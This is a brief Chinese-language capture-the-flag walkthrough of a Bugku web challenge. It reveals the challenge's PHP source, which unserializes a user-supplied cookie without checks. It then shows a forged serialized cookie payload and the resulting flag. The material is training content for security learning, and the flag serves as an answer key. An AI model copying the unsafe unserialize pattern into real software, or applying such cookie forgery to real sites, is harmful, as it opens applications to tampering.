Bugku CTF_Web——点login咋没反应
进入靶场
随便输个试试
看来确实点login没反应
抓包看看
也没有什么信息
看了下源码
给了点提示
一个admin.css
try ?12713
传参试试
拿到一个php代码
<?php
error_reporting(0);
$KEY='ctf.bugku.com';
include_once("flag.php");
$cookie = $_COOKIE['BUGKU'];
if(isset($_GET['12713'])){show_source(__FILE__);
}
elseif (unserialize($cookie) === "$KEY")
{ echo "$flag";
}
else {
?>
<html>
<head>
<meta http-equiv="Content-Type" content="text/html; charset=UTF-8">
<title>Login</title>
<link rel="stylesheet" href="admin.css" type="text/css">
</head>
<body>
<br>
<div class="container" align="center"><form method="POST" action="#"><p><input name="user" type="text" placeholder="Username"></p><p><input name="password" type="password" placeholder="Password"></p><p><input value="Login" type="button"/></p></form>
</div>
</body>
</html><?php
}
?>
使用unserialize($cookie)
将cookie反序列化,并将结果与$KEY
(即'ctf.bugku.com'
)进行比较。
如果反序列化后的$cookie
等于$KEY
,则会输出$flag
。
把$KEY反序列化
s:13:"ctf.bugku.com";
构造payload
Cookie:BUGKU=s:13:"ctf.bugku.com";
拿到flag
flag{970c389b63e5c55e6b9177645755fe02}